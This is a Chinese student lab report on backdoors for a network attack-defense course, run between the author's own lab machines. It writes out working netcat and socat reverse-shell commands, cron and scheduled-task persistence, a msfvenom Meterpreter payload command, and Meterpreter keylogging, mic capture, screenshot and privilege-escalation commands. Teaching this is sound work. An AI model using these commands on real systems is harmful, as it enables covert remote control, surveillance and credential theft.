20145203盖泽双《网络对抗技术》后门原理与实践

最新推荐文章于 2024-07-18 15:53:23 发布
最新推荐文章于 2024-07-18 15:53:23 发布
阅读量150 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/GZSdeboke/p/6573100.html
版权

20145203盖泽双《网络对抗技术》后门原理与实践

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

①连接带有后门病毒的网页。

②下载带有后门病毒的文件。

③主动连接不知名的私人网络。

④使用带有后门病毒的U盘或者硬盘。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

①cron启动方式。

②任务启动计划。

③windows或者linux反弹连接向它们注入后门的系统。

(3)Meterpreter有哪些给你映像深刻的功能?

①可以抓取被控主机的击键记录,以便获取被控主机的重要的用户名密码。

②可以控制被控主机的摄像头,窥探隐私很方便,可怕!

③可以获取被控主机的屏幕,随时了解被控用户的动态。

(4)如何发现自己有系统有没有被安装后门?

①如果被杀毒软件检测出有病毒程序,有可能就是后门。

②电脑cpu占用较高,经常死机,有可能被注入了后门程序。

③数据经常莫名丢失,文件打不开或者提示已损坏,很有可能被人植入了后门程序。

2.实验总结与体会

经过这次实验,我感触最深的就是了解到了杀毒软件的重要性。在我的旧电脑上,我一个杀毒软件也没有装,我觉得360经常会造成卡机,电脑管家不好用,其他的还要掏钱买,就觉得没有必要把钱花在这个上面,电脑自身的防火墙应该就足够了,以至于我的旧电脑寿命并不是很长。在这次实验中,我使用的是自己的新电脑,上面有迈克菲杀毒软件,我发现无论我怎么将后门程序放到可信任区,或者取消它的母文件的扫描。这个后门病毒都可以被检测出来,只有把迈克菲的防火墙和实时扫描关掉,后门程序才可以被运行。我的电脑的到了很好的保护,而且被后门软件控制的结果太可怕了,所以我决定迈克菲过期之后续费!
这个实验告诫了我们,在现在的电子信息高速发展的时代,自己的私人信息很容易被窃取,篡改。我们一定要有安全防范意识,尽可能的保护自己不受网络暴力的侵害。
 

3.实践过程记录

1、使用netcat获取主机操作Shell,cron启动。
   netcat:网络工具中的瑞士军刀,可在两台电脑之间建立链接并返回两个数据流 通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向来实现我们今天的后门。

(1)windows获取linux shell。
①windows打开监听,以便于在linux反弹连接时可获取其shell。
ncat.exe -l -p 5203
885795-20170318122810432-1624311495.png

②linux根据windows的ip地址进行反弹连接。
ipconfig
nc 192.168.43.151 5203 -e /bin/sh
885795-20170318122914416-1081786279.png

③windows获取其shell并对其文件进行修改。

885795-20170318122901151-2039524740.png

885795-20170318122906166-43882098.png

(2)windows对linux设置cron启动

    cron启动作用:windows对linux设置cron启动之后,windows将会在每个固定的时间点获取linux的shell。

①在linux中,使用crontab指令增加一条定时任务。
885795-20170318123209057-1473566571.png

②在windows终端进行端口监听,等到时间到了之后,进行ls操作。

885795-20170318123107776-1424058798.png

(3)linux获取windows shell
①linux下查看ip地址。
ifconfig
885795-20170318123250713-1752485988.png

②linux进行端口监听。
885795-20170318123257901-309603580.png

③windows根据linux的ip地址进行反弹连接。
885795-20170318123304432-2097834776.png

④linux获取windows shell,并对其进行操作

885795-20170318123314885-1256904327.png

885795-20170318123326198-269849051.png

2、使用socat获取主机操作Shell, 任务计划启动。
   socat是netcat(nc)的替代产品,是一个多功能的网络工具,名字来由是Socket CAT,可以看作是netcat的N倍加强版。socat的特点就是在两个流之间建立一個双向的通道。socat的地址类型很多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等。

①在linux中,使用 socat命令进行端口监听。
socat tcp-listen:5203 exec:bash,pty,stderr
885795-20170318123412260-1789485911.png

②在windows下,对linux进行反弹连接。并打开其20145203文件夹进行ls操作。
socat readline tcp:192.168.19.129:5203
885795-20170318123424495-942773876.png

③打开windows控制面板中的管理工具,选择任务计划程序,新建任务。
885795-20170318123435385-1667452657.png

④在新建任务窗口填写任务名字为20145203,并设置触发器以及操作。设置好后,运行该任务。
885795-20170318123444901-1160198337.png
885795-20170318123453557-1155148978.png
885795-20170318123523745-575958700.png

⑤因为换了无线网,所以电脑的ip地址有所改变,所以重新ipconfig一下。
885795-20170318123507135-1348905035.png

⑥在linux下,根据windows的ip地址对其5203端口进行连接。成功获得其windows shell。
socat - tcp:192.168.2.151:5203

885795-20170318123537682-2142358137.png

3、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。
  MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大。

①在linux下,生成反弹式端口型的后门程序。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=5203 -f exe >5203.exe
注意因为是反弹式端口型,所以这里生成后门程序中的ip地址,是虚拟机的ip地址。
885795-20170318123600948-1640701567.png

②在linux下,将后门文件发送到windows主机上。
ncat -nv 172.30.4.157 5203 < 5203.exe
885795-20170318123616916-1269506057.png

③windows下接收该后门程序,并将该后门文件设置为可信任文件,允许其通过防火墙进行通信。
ncat.exe -lv 5203>5203.exe
885795-20170318123655526-893521632.png

885795-20170318123722823-1950019775.png

④在linux下输入msfconsole,进入到msf平台。
885795-20170318123733885-219636598.png

⑤修改ip地址为虚拟机的ip地址。修改端口号为5203。并进行查看。
set LHOST 192.168.52.129
set LPORT 5203
show options
885795-20170318123751604-1081470739.png

⑥在linux下,打开后门程序的监听进程。在windows下运行该后门程序。linux成功获取windows的shell。
885795-20170318123802354-1552615784.png

4、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。

①获取目标主机音频。
record_mic
885795-20170318123814448-429488367.png

②获取目标主机屏幕。
screenshot
885795-20170318123828745-162198020.png

③获取目标主机的击键记录。
keyscan_start
keyscan_dump
885795-20170318123913151-235996444.png

④尝试提权。
getsystem
885795-20170318123922088-566482225.png

转载于:https://www.cnblogs.com/GZSdeboke/p/6573100.html

dingyan5016
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20194307肖江宇Exp2—后门原理实践
MYRLY的博客
03-28 3835
文章目录20194307肖江宇Exp-2后门原理实践1.实验基础1.1基础知识1.2常用后门工具NC和NetcatSoCat任何代理、转发等功能都可以用该工具实现。Meterpreter2.实验目标2.1实验环境3.实验过程3.1使用netcat获取主机操作Shell,cron启动**(1)在主机中获取虚拟机shell****(2)在虚拟机中获取主机shell****(3)在虚拟机中cron启动并在主机监听**3.2使用socat获取主机操作Shell,任务计划启动(1)在Windows获得Linux S
《计算机网络与信息安全技术》电子CH网络攻击行为分析PPT课件.ppt
11-23
《计算机网络与信息安全技术》电子CH网络攻击行为分析 本资源摘自《计算机网络与信息安全技术》电子CH网络攻击行为分析PPT课件,涵盖了计算机网络安全、黑客攻击技术网络攻击行为分析等方面的知识点。 一、网络...
webshell后门检测原理
weixin_40628059的博客
04-30 6832
一、什么是webshell shell (计算机壳层) 在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。Shell 编程跟 java、php 编程一样,只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。 Linux 的 ...
Exp2 后门原理实践
weixin_30838921的博客
03-25 484
Exp2 后门原理实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windows 7 sp1(64位) (IP: 10.0.2.7/24) nc/ncat的使用 nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具,有着网络工具中的“瑞士军刀”的...
20145203盖泽双网络对抗技术实践五:MSF基础应用
04-16 144
20145203盖泽双网络对抗技术实践五:MSF基础应用 1.实践目标 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。下面是我自己做的时候用的四个套路。 (1)一个针对Windows XP系统的主动渗透攻击。 (2)一个针对Windows XP系统中IE7的被动渗透攻击。 (3)一个针对Windows XP系统中Adobe Reader v9的被动渗透攻击。 ...
20145203盖泽双:Java实验报告二
04-17 105
Java实验报告二:Java面向对象程序设计 实验要求: 初步掌握单元测试和TDD 理解并掌握面向对象三要素:封装、继承、多态 初步掌握UML建模 熟悉S.O.L.I.D原则 了解设计模式 实验内容 (一)单元测试 (二)面向对象三要素 (三)设计模式初步 (四)练习 实验过程 (一)单元测试 (1) 三种代码: 伪代码、产品代码、测试代码。 伪代码与具体编程语言无关,伪代码从意图层...
网络安全现状与技术发展 (1).pdf
09-20
网络安全是当前数字化时代的重要议题,随着互联网技术的广泛应用,其对社会各领域的渗透,网络安全问题日益凸显。本文由呼伦贝尔学院网络中心的王欣撰写,旨在探讨网络安全的现状及其技术发展趋势。 首先,文章指出...
木马后门分析与实践.pdf
06-06
木马后门
基于生成式对抗网络的联邦学习后门攻击方案.docx
06-09
基于生成式对抗网络的联邦学习后门攻击方案.docx
Linux内核级后门原理及简单实战
08-10
【Linux内核级后门原理及简单实战】 在深入探讨Linux内核级后门之前,首先要理解Linux操作系统的...因此,理解内核级后门的工作原理对于网络安全至关重要,同时也要加强系统更新和安全审计,防止这类威胁的发生。
第二节 shell脚本基础(5)(6)(7)
weixin_73298423的博客
07-15 405
shell的执行方式,调试和退出值
操作系统核心之存储与控制
yuanwu932730169的博客
07-16 301
操作系统中,存储和控制是两个核心功能,它们共同支持着系统的正常运行和高效管理。
Win1011系统Windows Update无法启动拒绝访问怎么办?【解决方法】
不会编程的码农研究僧
07-15 448
6、确定之后下图所有者更改为Administers,并点击替换子容器和对象的所有者和使用此对象继承的权限替换所有子对象的权限项目,两项选中打对钩。这时候解决方法如下。1、通过“ Win+R ”组合键打开 运行 窗口,输入指令“ regedit ”,点击确定或者按下“ Enter ”键。5、点击更改后,再依次点击下图标号所示,选择Administers用户确定即可。4、发现所有者为SYSTEM,这种情况需要修改权限为Administers。3、右键点击wuauserv文件夹,依次点击【权限】、【高级】。
接着探索Linux的世界 -- 基本指令(文件查看、时间相关、打包压缩等等)
weixin_73359101的博客
07-14 1682
命令输出到某个指定文件中,而不是输出到终端屏幕或终端窗口。我们从键盘输入什么,cat命令就打印什么。命令 + >> + 目标文件名。: 将命令的结果写入目标文件中;这两条指令的作用等价。
HCNA VRP基础
hmxm6的博客
07-15 568
交换机可以隔离冲突域,路由器可以隔离广播域,这两种设备在企业网络中应用越来越广泛。随着越来越多的终端接入到网络中,网络设备的负担也越来越重,这时网络设备可以通过专有的VRP系统来提升运行效率。通过路由平台VRP是华为公司数据通讯产品的通用操作系统平台,他以UP业务为核心,采用组件化的体系结构,在实现丰富功能特性的同时,还提供了基于应用的可裁剪和可扩展的功能,使得路由器和交换机的运行笑了大大增加。能对VRP熟练地进行配置和操作是对网络工程师地一种基本要求。
Linux系统的用户组管理和权限以及创建用户
Johaden的博客
07-14 984
因此,我们可以根据每个用户的角色、职位和需求,为他们分配相应的权限,以确保服务器的安全性和有效管理。sudo(superuser do)是在类Unix操作系统中(包括Linux和macOS)常用的一个命令,它允许经过授权的用户以系统管理员(通常是root用户)的权限来运行程序或命令。2.在登陆Ubuntu时,会填写全名、用户名、密码等,所创建的这个用户就是默认用户,其中全名可以类似为一个昵称,用户名为主机名(较正式,不可随意更改)。超级用户可以执行系统上的所有命令,包括系统配置、文件访问和用户管理等。
鸿蒙读取本地文件同步,异步的优化问题
m0_63548381的博客
07-14 273
在大多数场景下 , 不要使用xxxSync同步方法 , 而要使用 await xxx 方法。(不仅arkTs ,别的语言也是类似)区别在于:Sync方法会等待文件读取完成,阻塞线程。await xxx方法也会等待文件读取完成,但不会阻塞线程。
linux常用命令
qq_57484399的博客
07-14 282
linux常用命令
python训练模型报错:BrokenPipeError: [Errno 32] Broken pipe
最新发布
Dxy1239310216的博客
07-18 214
如果问题持续存在,并且你的项目不是必须在 Windows 上运行,考虑在 Unix/Linux 系统上运行你的代码。确保在数据加载器中使用的任何自定义函数或类都是可序列化的,因为多进程需要能够在不同进程间传递它们。进行多进程数据加载时尤其常见,尤其是在 Windows 系统上,因为 Windows 对多进程的支持与 Unix/Linux 系统有所不同。有时候,错误可能是由其他部分的代码引起的,而不是直接由数据加载器引起。如果问题依然存在,你可能需要更详细地检查你的代码或寻求更专业的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值